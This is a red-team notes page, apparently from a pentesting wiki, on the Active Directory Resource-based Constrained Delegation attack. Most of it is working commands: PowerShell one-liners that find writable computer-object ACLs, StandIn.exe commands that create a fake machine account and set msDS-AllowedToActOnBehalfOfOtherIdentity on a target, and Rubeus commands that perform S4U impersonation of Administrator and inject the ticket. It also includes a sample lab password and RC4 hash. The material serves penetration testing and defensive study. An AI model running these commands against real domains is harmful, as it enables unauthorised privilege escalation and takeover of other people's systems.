Resource-based Constrained Delegation

It's possible to gain code execution with elevated privileges on a remote computer if you have WRITE privilege on that computer's AD object.

Resource-based Constrained Delegation

Microsoft in an attempt to provide more flexibility to domain users enabled owner of resources to configure which accounts are trusted and allowed to delegate to them. This is achieved by modification of the attribute “ms-DS-AllowedToActOnBehalfOfOtherIdentity” which is used to control access of the target resource. Specifically if a resource such as a computer account has this attribute set then an account is allowed to act on behalf of the computer account. In order to be able to modify this attribute an account would need write permissions over that object which by default doesn’t have. However, if the SYSTEM account could be triggered and the authentication is relayed towards the Active Directory then it might be possible an account to obtain delegation rights and therefore to be able to act as an elevated user.

Detection

Required

  • WRITE privilege on a computer's AD object

  • Compromised computer and machine account hash OR

  • Ability to create a "fake" computer on the AD

If you have a previous compromise machine and machine hash/credential you can skip the skeps of creating a new machine.

Checking ms-ds-machineaccountquota

Since the attack will entail creating a new computer object on the domain, let's check if users are allowed to do it - by default, a domain member usually can add up to 10 computers to the domain. To check this, we can query the root domain object and look for property ms-ds-machineaccountquota

Using WMI

Get-WmiObject -Namespace root\directory\ldap -Class ds_domain | select DS_ms_DS_MachineAccountQuota

Detecting WRITE access

# Get all sids, all computer object ACLs, and find RBCD
$usersid = get-domainuser | select -exp objectsid; "Got user SIDS"; $computeracls = Get-DomainComputer | select -exp dnshostname | get-domainobjectacl; "Got computer ACLs"; "Search through acls for RBCD..."; foreach ($acl in $computeracls) { foreach($sid in $usersid) { $acl | ?{$_.SecurityIdentifier -eq $sid -and ($_.ActiveDirectoryRights -Like '*GenericAll*' -or $_.ActiveDirectoryRights -Like '*GenericWrite*' -or $_.ActiveDirectoryRights -Like '*WriteOwner*')} } }

# Get all SIDS, all computer object ACLs, and find RBCD
$groupsid = $groups = Get-DomainGroup | Where-Object {$_.SamAccountName -ne "Domain Admins" -and $_.SamAccountName -ne "Account Operators" -and $_.SamAccountName -ne "Enterprise Admins" -and $_.SamAccountName -ne "Administrators" -and $_.SamAccountName -ne "DnsAdmins" -and $_.SamAccountName -ne "Schema Admins" -and $_.SamAccountName -ne "Key Admins" -and $_.SamAccountName -ne "Enterprise Key Admins" -and $_.SamAccountName -ne "Storage Replica Administrators"} | select -exp objectsid; "Got group SIDS"; $computeracls = Get-DomainComputer | select -exp dnshostname | get-domainobjectacl; "Got computer ACLs"; "Search through acls for RBCD..."; foreach ($acl in $computeracls) { foreach($sid in $groupsid) { $acl | ?{$_.SecurityIdentifier -eq $sid -and ($_.ActiveDirectoryRights -Like '*GenericAll*' -or $_.ActiveDirectoryRights -Like '*GenericWrite*' -or $_.ActiveDirectoryRights -Like '*WriteOwner*')} } }

# Get all computer object SIDS, all computer object ACLs, and find RBCD
$computersid = get-domaincomputer | select -exp objectsid; "Got computer SIDS"; $computeracls = Get-DomainComputer | select -exp dnshostname | get-domainobjectacl; "Got computer ACLs"; "Search through acls for RBCD..."; foreach ($acl in $computeracls) { foreach($sid in $computersid) { $acl | ?{$_.SecurityIdentifier -eq $sid -and($_.ActiveDirectoryRights -Like '*GenericAll*' -or $_.ActiveDirectoryRights -Like '*GenericWrite*' -or $_.ActiveDirectoryRights -Like '*WriteOwner*')} } }

Exploiting

Using StandIn.exe to create and add msDS-AllowedToActOnBehalfOfOtherIdentity to computer object.

LogoGitHub - FuzzySecurity/StandIn: StandIn is a small .NET35/45 AD post-exploitation toolkitGitHub

Creating fake computer object

StandIn.exe --computer [fake computer] --make

Modifying Target Computer's AD Object

With write access to a machine object this function allows the operator to add an msDS-AllowedToActOnBehalfOfOtherIdentity property to the machine which is required to perform a resource based constrained delegation attack.

$ServiceAccountSID = Get-DomainComputer [fake computer] -Properties objectsid | Select -Expand objectsid
StandIn.exe --computer [target machine] --sid $ServiceAccountSID

Verifying change

StandIn.exe --delegation

Getting the hash value for machine account hash

Invoke-Rubeus -Command "hash /password:dZMRM5i0V5Bhdw1 /user:AttackObjStudent16$ /domain:it.gcb.local"

Impersonation

Invoke-Rubeus -Command "s4u /user:[fake computer]$ /rc4:[fake computer hash] /impersonateuser:[Impersonation user] /msdsspn:cifs/[target machine] /ptt"

# Invoke-Rubeus -Command 's4u /user:IT-Employee16$ /rc4:f2870d37a6ead900448faae043f13a5c /impersonateuser:Administrator /msdsspn:host/it-track01 /altservice:cifs /domain:it.gcb.local /nowrap /ptt'

References

LogoKerberos Resource-based Constrained Delegation: Computer Object TakeoverRed Teaming Experiments
PreviousConstrained delegationNextEscalating from child to parent domain

Last updated